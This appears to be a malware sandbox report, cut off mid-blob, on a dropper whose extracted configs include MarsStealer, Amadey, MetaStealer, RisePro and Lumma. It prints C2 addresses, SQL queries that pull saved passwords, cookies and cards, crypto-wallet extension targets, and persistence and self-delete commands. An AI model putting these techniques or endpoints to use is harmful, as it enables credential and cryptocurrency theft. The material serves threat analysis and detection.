Fractal Wallet

algblmhagnobbnmakepomicmfljlbehg

ADS Wallet

imijjbmbnebfnbmonjeileijahaipglj

Moonlet Wallet

kpjdchaapjheajadlaakiiigcbhoppda

ZEBEDEE

dlcobpjiigpikoobohmabehhmhfoodbb

Argent X StarkNet Wallet

bofddndhbegljegmpmnlbhcejofmjgbn

X-Wallet

mapbhaebnddapnmifbbkgeedkeplgjmf

Biport Wallet

kfdniefadaanbjodldohaedphafoffoh

Typhon Wallet

jaooiolkmfcmloonphpiiogkfckgciom

Twetch Wallet

aijcbedoijmgnlmjeegjaglmepbmpkpi

Leap Wallet

fhfffofbcgbjjojdnpcfompojdjjhdim

Lamden Wallet

agkfnefiabmfpanochlcakggnkdfmmjd

Earth Wallet

lpfcbjknijpeeillifnkikgncikgfhdo

Nami

fecfflganphcinpahcklgahckeohalog

Coin Wallet

ilhaljfiglknggcoegeknjghdgampffk

Beam Web Wallet

dklmlehijiaepdijfnbbhncfpcoeeljf

FShares Wallet

fkhebcilafocjhnlcngogekljmllgdhd

WAGMIswap.io Wallet

laphpbhjhhgigmjoflgcchgodbbclahk

BLUE - Worlds Safest and Simplest Wallet

mkjjflkhdddfjhonakofipfojoepfndk

Unification Web Wallet

jnldfbidonfeldmalbflbmlebbipcnle

Infinity Wallet

ellkdbaphhldpeajbepobaecooaoafpg

Fetch.ai Network Wallet

iokeahhehimjnekafflcihljlcjccdbe

Alby Wallet

omajpeaffjgmlpmhbfdjepdejoemifpe

xBull Wallet

pgojdfajgcjjpjnbpfaelnpnjocakldb

Sugarchain Wallet

pnndplcbkakcplkjnolgbkdgjikjednm

Tronium

fnnegphlobjdpkhecapkijjdkgcjhkib

Harmony

fhilaheimglignddkjgofkcbgekhenbh

Oxygen

cmbagcoinhmacpcgmbiniijboejgiahi

JustLiquidity Wallet

kmmolakhbgdlpkjkcjkebenjheonagdm

AlgoSigner

fnabdmcgpkkjjegokfcnfbpneacddpfh

Goldmint Lite Wallet

bgpipimickeadkjlklgciifhnalhdjhe

GeroWallet

hoighigmnhgkkdaenafgnefkcmipfjon

EO.Finance

nlgnepoeokdfodgjkjiblkadkjbdfmgd

Multi Wallet

nhihjlnjgibefgjhobhcphmnckoogdea

Waves Enterprise Wallet

ehibhohmlpipbaogcknmpmiibbllplph

Bluehelix Wallet

magbanejlegnbcppjljfhnmfmghialkl

Nebulas Wallet

fgkaeeikaoeiiggggbgdcjchmdfmamla

Vtimes

pnlfjmlcjdjgkddecgincndfgegkecke

Crocobit Wallet

bhghoamapcdpbohphigoooaddinpkbai

Authenticator

gaedmjdfmmahhbjefcbgaolhhanlaolb

Authy

oeljdldpnmdbchonielidgobddffflal

EOS Authenticator

ilgcnhelpchnceeipipijaljkblbcobl

GAuth Authenticator

imloifkgjagghnncjkhggdhalmcnfklk

Trezor Password Manager

%s\%s\Local Extension Settings\%s

%s\CURRENT

%s\%s\Sync Extension Settings\%s

%s\%s\IndexedDB\chrome-extension_%s_0.indexeddb.leveldb

Plugins\

HARDWARE\DESCRIPTION\System\CentralProcessor\0

ProcessorNameString

SOFTWARE\Microsoft\Windows NT\CurrentVersion

ProductName

x64

x86

DISPLAY

SOFTWARE\Microsoft\Cryptography

MachineGuid

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

DisplayName

DisplayVersion

screenshot.jpg

ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890

/c timeout /t 5 & del /f /q "%s" & exit

C:\Windows\System32\cmd.exe

MarsStealer

(PID) Process(3236) data64_1.exe

C2gg.gemkan.online/gate.php

Keys

XOR

Base64_Encoded_KeyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

PurposeC2 domain

Base64_Encoded_KeyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

PurposeC2 route

Base64_Encoded_KeyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

PurposeCode encryption

Strings (618)LoadLibraryA

GetProcAddress

ExitProcess

advapi32.dll

crypt32.dll

GetTickCount

Sleep

GetUserDefaultLangID

CreateMutexA

GetLastError

HeapAlloc

GetProcessHeap

GetComputerNameA

VirtualProtect

GetCurrentProcess

VirtualAllocExNuma

GetUserNameA

CryptStringToBinaryA

HAL9TH

JohnDoe

21/04/2022 20:00:00

http://

Default

%hu/%hu/%hu %hu:%hu:%hu

open

sqlite3.dll

C:\ProgramData\sqlite3.dll

freebl3.dll

C:\ProgramData\freebl3.dll

mozglue.dll

C:\ProgramData\mozglue.dll

msvcp140.dll

C:\ProgramData\msvcp140.dll

nss3.dll

C:\ProgramData\nss3.dll

softokn3.dll

C:\ProgramData\softokn3.dll

vcruntime140.dll

C:\ProgramData\vcruntime140.dll

.zip

Tag:

IP: IP?

Country: Country?

Working Path:

Local Time:

TimeZone:

Display Language:

Keyboard Languages:

Is Laptop:

Processor:

Installed RAM:

OS:

(

Bit)

Videocard:

Display Resolution:

PC name:

User name:

Domain name:

MachineID:

GUID:

Installed Software:

system.txt

Grabber\%s.zip

%APPDATA%

%LOCALAPPDATA%

%USERPROFILE%

%DESKTOP%

Wallets\

Ethereum

\Ethereum\

keystore

Electrum

\Electrum\wallets\

*.*

ElectrumLTC

\Electrum-LTC\wallets\

Exodus

\Exodus\

exodus.conf.json

window-state.json

\Exodus\exodus.wallet\

passphrase.json

seed.seco

info.seco

ElectronCash

\ElectronCash\wallets\

default_wallet

MultiDoge

\MultiDoge\

multidoge.wallet

JAXX

\jaxx\Local Storage\

file__0.localstorage

Atomic

\atomic\Local Storage\leveldb\

000003.log

CURRENT

LOCK

LOG

MANIFEST-000001

0000*

Binance

\Binance\

app-store.json

Coinomi

\Coinomi\Coinomi\wallets\

*.wallet

*.config

*wallet*.dat

GetSystemTime

lstrcatA

SystemTimeToFileTime

ntdll.dll

sscanf

memset

memcpy

wininet.dll

user32.dll

gdi32.dll

netapi32.dll

psapi.dll

bcrypt.dll

vaultcli.dll

shlwapi.dll

shell32.dll

gdiplus.dll

ole32.dll

dbghelp.dll

CreateFileA

WriteFile

CloseHandle

GetFileSize

lstrlenA

LocalAlloc

GlobalFree

ReadFile

OpenProcess

SetFilePointer

SetEndOfFile

GetCurrentProcessId

GetLocalTime

GetTimeZoneInformation

GetUserDefaultLocaleName

LocalFree

GetSystemPowerStatus

GetSystemInfo

GlobalMemoryStatusEx

IsWow64Process

GetTempPathA

GetLocaleInfoA

GetFileSizeEx

GetFileAttributesA

FindFirstFileA

FindNextFileA

FindClose

GetCurrentDirectoryA

CopyFileA

DeleteFileA

lstrcmpW

GlobalAlloc

FreeLibrary

SetCurrentDirectoryA

CreateFileMappingA

MapViewOfFile

UnmapViewOfFile

FileTimeToSystemTime

GetFileInformationByHandle

GlobalLock

GlobalSize

WideCharToMultiByte

GetWindowsDirectoryA

GetVolumeInformationA

GetVersionExA

GetModuleFileNameA

CreateFileW

CreateFileMappingW

MultiByteToWideChar

CreateThread

GetEnvironmentVariableA

SetEnvironmentVariableA

lstrcpyA

lstrcpynA

InternetOpenA

InternetConnectA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

InternetCloseHandle

InternetReadFile

InternetSetOptionA

InternetOpenUrlA

InternetCrackUrlA

wsprintfA

CharToOemW

GetKeyboardLayoutList

EnumDisplayDevicesA

ReleaseDC

GetDC

GetSystemMetrics

GetDesktopWindow

GetWindowRect

GetWindowDC

CloseWindow

RegOpenKeyExA

RegQueryValueExA

RegCloseKey

GetCurrentHwProfileA

RegEnumKeyExA

RegGetValueA

CreateDCA

GetDeviceCaps

CreateCompatibleDC

CreateCompatibleBitmap

SelectObject

BitBlt

DeleteObject

StretchBlt

GetObjectW

GetDIBits

SaveDC

CreateDIBSection

DeleteDC

RestoreDC

DsRoleGetPrimaryDomainInformation

GetModuleFileNameExA

CryptUnprotectData

BCryptCloseAlgorithmProvider

BCryptDestroyKey

BCryptOpenAlgorithmProvider

BCryptSetProperty

BCryptGenerateSymmetricKey

BCryptDecrypt

VaultOpenVault

VaultCloseVault

VaultEnumerateItems

VaultGetItemWin8

VaultGetItemWin7

VaultFree

StrCmpCA

StrStrA

PathMatchSpecA

SHGetFolderPathA

ShellExecuteExA

GdipGetImageEncodersSize

GdipGetImageEncoders

GdipCreateBitmapFromHBITMAP

GdiplusStartup

GdiplusShutdown

GdipSaveImageToStream

GdipDisposeImage

GdipFree

CreateStreamOnHGlobal

GetHGlobalFromStream

SymMatchString

HEAD

HTTP/1.1

GET

POST

file

Content-Type: multipart/form-data; boundary=----

Content-Disposition: form-data; name="

Content-Disposition: form-data; name="file"; filename="

Content-Type: application/octet-stream

Content-Transfer-Encoding: binary

SOFT:

PROF: ?

PROF:

HOST:

USER:

PASS:

sqlite3_open

sqlite3_prepare_v2

sqlite3_step

sqlite3_column_text

sqlite3_finalize

sqlite3_close

sqlite3_column_bytes

sqlite3_column_blob

encrypted_key

PATH

PATH=

NSS_Init

NSS_Shutdown

PK11_GetInternalKeySlot

PK11_FreeSlot

PK11_Authenticate

PK11SDR_Decrypt

SELECT origin_url, username_value, password_value FROM logins

Cookies\%s_%s.txt

SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies

TRUE

FALSE

Autofill\%s_%s.txt

SELECT name, value FROM autofill

CC\%s_%s.txt

SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards

Card number:

Name on card:

Expiration date:

History\%s_%s.txt

SELECT url FROM urls

Downloads\%s_%s.txt

SELECT target_path, tab_url from downloads

Web Data

History

SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies

logins.json

formSubmitURL

usernameField

encryptedUsername

encryptedPassword

guid

SELECT fieldname, value FROM moz_formhistory

SELECT url FROM moz_places

cookies.sqlite

formhistory.sqlite

places.sqlite

\Local State

..\profiles.ini

C:\ProgramData\

Chrome

\Google\Chrome\User Data

ChromeBeta

\Google\Chrome Beta\User Data

ChromeCanary

\Google\Chrome SxS\User Data

Chromium

\Chromium\User Data

Edge_Chromium

\Microsoft\Edge\User Data

Kometa

\Kometa\User Data

Amigo

\Amigo\User Data

Torch

\Torch\User Data

Orbitum

\Orbitum\User Data

Comodo

\Comodo\Dragon\User Data

Nichrome

\Nichrome\User Data

Maxthon5

\Maxthon5\Users

Sputnik

\Sputnik\User Data

EPB

\Epic Privacy Browser\User Data

Vivaldi

\Vivaldi\User Data

CocCoc

\CocCoc\Browser\User Data

Uran

\uCozMedia\Uran\User Data

QIP

\QIP Surf\User Data

Cent

\CentBrowser\User Data

Elements

\Elements Browser\User Data

TorBro

\TorBro\Profile

CryptoTab

\CryptoTab Browser\User Data

Brave

\BraveSoftware\Brave-Browser\User Data

Opera

\Opera Software\Opera Stable\

OperaGX

\Opera Software\Opera GX Stable\

OperaNeon

\Opera Software\Opera Neon\User Data

Firefox

\Mozilla\Firefox\Profiles\

SlimBrowser

\FlashPeak\SlimBrowser\Profiles\

PaleMoon

\Moonchild Productions\Pale Moon\Profiles\

Waterfox

\Waterfox\Profiles\

Cyberfox

\8pecxstudios\Cyberfox\Profiles\

BlackHawk

\NETGATE Technologies\BlackHawk\Profiles\

IceCat

\Mozilla\icecat\Profiles\

KMeleon

\K-Meleon\

Thunderbird

\Thunderbird\Profiles\

passwords.txt

ibnejdfjmmkpcnlpebklmnkoeoihofec

TronLink

nkbihfbeogaeaoehlefnkodbefgpgknn

MetaMask

fhbohimaelbohpjbbldcngcnapndodjp

Binance Chain Wallet

ffnbelfdoeiohenkjibnmadjiehjhajb

Yoroi

jbdaocneiiinmjbjlgalhcelgbejmnid

Nifty Wallet

afbcbjpbpfadlkmhmclhkeeodmamcflc

Math Wallet

hnfanknocfeofbddgcijnmhnfnkdnaad

Coinbase Wallet

hpglfhgfnhbgpjdenjgmdgoeiappafln

Guarda

blnieiiffboillknjnepogjhkgnoapac

EQUAL Wallet

cjelfplplebdjjenllpjcblmjkfcffne

Jaxx Liberty

fihkakfobkmkjojpchpfgcmhfjnmnfpi

BitApp Wallet

kncchdigobghenbbaddojjnnaogfppfj

iWallet

amkmjjmmflddogmhpjloimipbofnfjih

Wombat

nlbmnnijcnlegkjjpcfjclmcfggfefdm

MEW CX

nanjmdknhkinifnkgdcggcfnhdaammmj

GuildWallet

nkddgncdjgjfcddamfgcmfnlhccnimig

Saturn Wallet

fnjhmkhhmkbjkkabndcnnogagogbneec

Ronin Wallet

cphhlgmgameodnhkjdmkpanlelnlohao

NeoLine

nhnkbkgjikgcigadomkphalanndcapjk

Clover Wallet

kpfopkelmapcoipemfendmdcghnegimn

Liquality Wallet

aiifbnbfobpmeekipheeijimdpnlpgpp

Terra Station

dmkamcknogkgcdfhhbddcghachkejeap

Keplr

fhmfendgdocmcbmfikdcogofphimnkno

Sollet

cnmamaachppnkjgnildpdmkaakejnhae

Auro Wallet

jojhfeoedkpkglbfimdfabpdfjaoolaf

Polymesh Wallet

flpiciilemghbmfalicajoolhkkenfel

ICONex

nknhiehlklippafakaeklbeglecifhad

Nabox Wallet

hcflpincpppdclinealmandijcmnkbgn

KHC

ookjlbkiijinhpmnjffcofjonbfbgaoc

Temple

mnfifefkajgofkcjkemidiaecocnkjeh

TezBox

dkdedlpgdmmkkfjabffeganieamfklkm

Cyano Wallet

nlgbhdfgdhgbiamfdfmbikcdghidoadd

Byone

infeboajgfhgbjpjbeppbkgnabfdkdaf

OneKey

cihmoadaighcejopammfbmddcmdekcje

LeafWallet

lodccjjbdhfakaekdiahmedfbieldgik

DAppPlay

ijmpgkjfkbfhoebgogflfebnmejmfbml

BitClip

lkcjlnjfpbikmcmbachjpdbijejflpcm

Steem Keychain

onofpnbbkehpmmoabgpcpmigafmmnjhl

Nash Extension

bcopgchhojmggmffilplmbdicgaihlkp

Hycon Lite Client

klnaejjgbibmhlephnhpmaofohgkpgkd

ZilPay

aeachknmefphepccionboohckonoeemg

Coin98 Wallet

bfnaelmomeimhlpmgjnjophhpkkoljpa

Phantom

hifafgmccdpekplomjjkcfgodnhcellj

Crypto.com

dngmlblcodfobpdpecaadgfbcggfjfnm

Maiar DeFi Wallet

ppdadbejkmjnefldpcdjhnkpbjkikoip

Oasis

hpbgcgmiemanfelegbndmhieiigkackl

MonstaWallet

fcckkdbjnoikooededlapcalpionmalo

MOBOX

jccapkebeeiajkkdemacblkjhhhboiek

Crust Wallet

mgffkfbidihjpoaomajlbgchddlicgpn

Pali Wallet

nphplpgoakhhjchkkhmiggakijnkhfnd

TON Wallet

ldinpeekobnhjjdofggfgjlcehhmanlj

Hiro Wallet

pocmplpaccanhmnllbbkpgfliimjljgo

Slope Wallet

bhhhlbepdkbapadjdnnojkbgioiodbic

Solflare Wallet

pgiaagfkgcbnmiiolekcfmljdagdhlcm

Stargazer Wallet

cgeeodpfagjceefieflmdfphplkenlfk

EVER Wallet

gjkdbeaiifkpoencioahhcilildpjhgh

partisia-wallet

bgjogpoidejdemgoochpnkmdjpocgkha

Ecto Wallet

ifckdpamphokdglkkdomedpdegcjhjdp

ONTO Wallet

agechnindjilpccclelhlbjphbgnobpf

Fractal Wallet

algblmhagnobbnmakepomicmfljlbehg

ADS Wallet

imijjbmbnebfnbmonjeileijahaipglj

Moonlet Wallet

kpjdchaapjheajadlaakiiigcbhoppda

ZEBEDEE

dlcobpjiigpikoobohmabehhmhfoodbb

Argent X StarkNet Wallet

bofddndhbegljegmpmnlbhcejofmjgbn

X-Wallet

mapbhaebnddapnmifbbkgeedkeplgjmf

Biport Wallet

kfdniefadaanbjodldohaedphafoffoh

Typhon Wallet

jaooiolkmfcmloonphpiiogkfckgciom

Twetch Wallet

aijcbedoijmgnlmjeegjaglmepbmpkpi

Leap Wallet

fhfffofbcgbjjojdnpcfompojdjjhdim

Lamden Wallet

agkfnefiabmfpanochlcakggnkdfmmjd

Earth Wallet

lpfcbjknijpeeillifnkikgncikgfhdo

Nami

fecfflganphcinpahcklgahckeohalog

Coin Wallet

ilhaljfiglknggcoegeknjghdgampffk

Beam Web Wallet

dklmlehijiaepdijfnbbhncfpcoeeljf

FShares Wallet

fkhebcilafocjhnlcngogekljmllgdhd

WAGMIswap.io Wallet

laphpbhjhhgigmjoflgcchgodbbclahk

BLUE - Worlds Safest and Simplest Wallet

mkjjflkhdddfjhonakofipfojoepfndk

Unification Web Wallet

jnldfbidonfeldmalbflbmlebbipcnle

Infinity Wallet

ellkdbaphhldpeajbepobaecooaoafpg

Fetch.ai Network Wallet

iokeahhehimjnekafflcihljlcjccdbe

Alby Wallet

omajpeaffjgmlpmhbfdjepdejoemifpe

xBull Wallet

pgojdfajgcjjpjnbpfaelnpnjocakldb

Sugarchain Wallet

pnndplcbkakcplkjnolgbkdgjikjednm

Tronium

fnnegphlobjdpkhecapkijjdkgcjhkib

Harmony

fhilaheimglignddkjgofkcbgekhenbh

Oxygen

cmbagcoinhmacpcgmbiniijboejgiahi

JustLiquidity Wallet

kmmolakhbgdlpkjkcjkebenjheonagdm

AlgoSigner

fnabdmcgpkkjjegokfcnfbpneacddpfh

Goldmint Lite Wallet

bgpipimickeadkjlklgciifhnalhdjhe

GeroWallet

hoighigmnhgkkdaenafgnefkcmipfjon

EO.Finance

nlgnepoeokdfodgjkjiblkadkjbdfmgd

Multi Wallet

nhihjlnjgibefgjhobhcphmnckoogdea

Waves Enterprise Wallet

ehibhohmlpipbaogcknmpmiibbllplph

Bluehelix Wallet

magbanejlegnbcppjljfhnmfmghialkl

Nebulas Wallet

fgkaeeikaoeiiggggbgdcjchmdfmamla

Vtimes

pnlfjmlcjdjgkddecgincndfgegkecke

Crocobit Wallet

bhghoamapcdpbohphigoooaddinpkbai

Authenticator

gaedmjdfmmahhbjefcbgaolhhanlaolb

Authy

oeljdldpnmdbchonielidgobddffflal

EOS Authenticator

ilgcnhelpchnceeipipijaljkblbcobl

GAuth Authenticator

imloifkgjagghnncjkhggdhalmcnfklk

Trezor Password Manager

%s\%s\Local Extension Settings\%s

%s\CURRENT

%s\%s\Sync Extension Settings\%s

%s\%s\IndexedDB\chrome-extension_%s_0.indexeddb.leveldb

Plugins\

HARDWARE\DESCRIPTION\System\CentralProcessor\0

ProcessorNameString

SOFTWARE\Microsoft\Windows NT\CurrentVersion

ProductName

x64

x86

DISPLAY

SOFTWARE\Microsoft\Cryptography

MachineGuid

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

DisplayName

DisplayVersion

screenshot.jpg

ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890

/c timeout /t 5 & del /f /q "%s" & exit

C:\Windows\System32\cmd.exe

Amadey

(PID) Process(2616) jsc.exe

C2 (1)http://45.9.74.182

Version3.86

Options

Drop directoryS-%lu-

Drop name%-lu

Strings (119)-%lu

f3f10bd848

bstyoops.exe

SCHTASKS

/Create /SC MINUTE /MO 1 /TN

/TR "

" /F

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Startup

Rem

cmd /C RMDIR /s/q

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

rundll32

/Delete /TN "

Programs

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

%USERPROFILE%

\App

POST

GET

id=

&vs=

&sd=

&os=

&bi=

&ar=

&pc=

&un=

&dm=

&av=

&lv=

&og=

cred.dll|clip.dll|

Main

http://

https://

exe

dll

cmd

ps1

<c>

<d>

Plugins/

+++

&unit=

shell32.dll

kernel32.dll

GetNativeSystemInfo

ProgramData\

AVAST Software

Avira

Kaspersky Lab

ESET

Panda Security

Doctor Web

AVG

360TotalSecurity

Bitdefender

Norton

Sophos

Comodo

WinDefender

0123456789

Content-Type: multipart/form-data; boundary=----

------

Content-Disposition: form-data; name="data"; filename="

" Content-Type: application/octet-stream

------

?scr=1

.jpg

Content-Type: application/x-www-form-urlencoded

SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName

ComputerName

abcdefghijklmnopqrstuvwxyz0123456789-_

-unicode-

SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\

SYSTEM\ControlSet001\Services\BasicDisplay\Video

VideoID

\0000

DefaultSettings.XResolution

DefaultSettings.YResolution

SOFTWARE\Microsoft\Windows NT\CurrentVersion

ProductName

2019

2022

2016

CurrentBuild

echo Y|CACLS "

" /P "

:N"

CACLS "

" /P "

:R" /E

:F" /E

&&Exit

..\

:::

rundll32.exe

"taskkill /f /im "

" && timeout 1 && del

&& Exit"

" && ren

Powershell.exe

-executionpolicy remotesigned -File "

MetaStealer

(PID) Process(1864) RegSvcs.exe

C2 (1)5.42.65.60:29012

BotnetOWN STUK

Options

ErrorMessage

Keys

XorPointsman

RisePro

(PID) Process(3240) rise.exe

C2193.233.132.51

Lumma

(PID) Process(5456) crypted.exe

C2185.99.133.246

Options

LummaIDNMlPqS

BuildLummaC2, Build 20233101

No Malware configuration.

Add for printing

TRiD

.exe	\|	Generic CIL Executable (.NET, Mono, etc.) (82.9)
.dll	\|	Win32 Dynamic Link Library (generic) (7.4)
.exe	\|	Win32 Executable (generic) (5.1)
.exe	\|	Generic Win/DOS Executable (2.2)
.exe	\|	DOS Executable Generic (2.2)

EXIF

EXE

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2023:12:22 09:29:10+01:00
ImageFileCharacteristics:	Executable, Large address aware
PEType:	PE32
LinkerVersion:	80
CodeSize:	5632
InitializedDataSize:	4608
UninitializedDataSize:	-
EntryPoint:	0x3552
OSVersion:	4
ImageVersion:	-
SubsystemVersion:	6
Subsystem:	Windows command line
FileVersionNumber:	0.0.0.0
ProductVersionNumber:	0.0.0.0
FileFlagsMask:	0x003f
FileFlags:	(none)
FileOS:	Win32
ObjectFileType:	Executable application
FileSubtype:	-
LanguageCode:	Neutral
CharacterSet:	Unicode
FileDescription:
FileVersion:	0.0.0.0
InternalName:	4363463463464363463463463.exe
LegalCopyright:
OriginalFileName:	4363463463464363463463463.exe
ProductVersion:	0.0.0.0
AssemblyVersion:	0.0.0.0

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

1 340

Monitored processes

1 122

Malicious processes

111

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

116

C:\Users\admin\AppData\Local\Temp\3582-490\stub.exe

—

svchost.com

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\3582-490\stub.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll

116

schtasks.exe /create /tn "4363463463464363463463463.bin4" /sc MINUTE /mo 6 /tr "'C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\4363463463464363463463463.bin.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Manages scheduled tasks

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll

124

"C:\Users\admin\AppData\Local\Temp\3582-490\stub.exe"

C:\Users\admin\AppData\Local\Temp\3582-490\stub.exe

—

stub.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\3582-490\stub.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\apphelp.dll
c:\windows\svchost.exe

124

C:\Users\admin\AppData\Local\Temp\3582-490\stub.exe

—

svchost.com

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\3582-490\stub.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll

124

C:\Users\admin\AppData\Local\Temp\3582-490\stub.exe

—

svchost.com

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\3582-490\stub.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll

124

"C:\Windows\svchost.com" "C:\Users\admin\Desktop\Files\route.exe"

C:\Windows\svchost.com

—

4363463463464363463463463.bin.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\windows\svchost.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll

292

C:\Windows\system32\cmd.exe /C AT /delete /yes

C:\Windows\System32\cmd.exe

—

Wattyl.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

324

C:\Users\admin\Desktop\Files\SYSTEM~1.EXE

C:\Users\admin\Desktop\Files\SystemUpdate.exe

—

svchost.com

User:

admin

Company:

Microsoft® Windows®

Integrity Level:

HIGH

Description:

Programs Engine

Exit code:

Version:

10.0.19041.746

392

"C:\Users\admin\Desktop\Files\updHost.exe"

C:\Users\admin\Desktop\Files\updHost.exe

—

4363463463464363463463463.bin.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\desktop\files\updhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll

392

C:\Users\admin\AppData\Local\Temp\3582-490\stub.exe

—

svchost.com

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\3582-490\stub.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll

Add for printing

Total events

291 042

Read events

287 276

Write events

3 745

Delete events

Modification events


(PID) Process:	(2064) 4363463463464363463463463.bin.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:	write	Name:	LanguageList
Value: en-US
(PID) Process:	(2064) 4363463463464363463463463.bin.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD
Operation:	write	Name:	Blob
Value: 530000000100000040000000303E301F06092B06010401A032010130123010060A2B0601040182373C0101030200C0301B060567810C010330123010060A2B0601040182373C0101030200C0190000000100000010000000D0FD3C9C380D7B65E26B9A3FEDD39B8F0B000000010000003000000047006C006F00620061006C005300690067006E00200052006F006F00740020004300410020002D002000520033000000620000000100000020000000CBB522D7B7F127AD6A0113865BDF1CD4102E7D0759AF635A7CF4720DC963C53B1400000001000000140000008FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC1D000000010000001000000001728E1ECF7A9D86FB3CEC8948ABA953030000000100000014000000D69B561148F01C77C54578C10926DF5B856976AD0F00000001000000200000005229BA15B31B0C6F4CCA89C2985177974327D1B689A3B935A0BD975532AF22AB090000000100000054000000305206082B0601050507030206082B06010505070303060A2B0601040182370A030406082B0601050507030406082B0601050507030606082B0601050507030706082B0601050507030106082B060105050703082000000001000000630300003082035F30820247A003020102020B04000000000121585308A2300D06092A864886F70D01010B0500304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E301E170D3039303331383130303030305A170D3239303331383130303030305A304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E30820122300D06092A864886F70D01010105000382010F003082010A0282010100CC2576907906782216F5C083B684CA289EFD057611C5AD8872FC460243C7B28A9D045F24CB2E4BE1608246E152AB0C8147706CDD64D1EBF52CA30F823D0C2BAE97D7B614861079BB3B1380778C08E149D26A622F1F5EFA9668DF892795389F06D73EC9CB26590D73DEB0C8E9260E8315C6EF5B8BD20460CA49A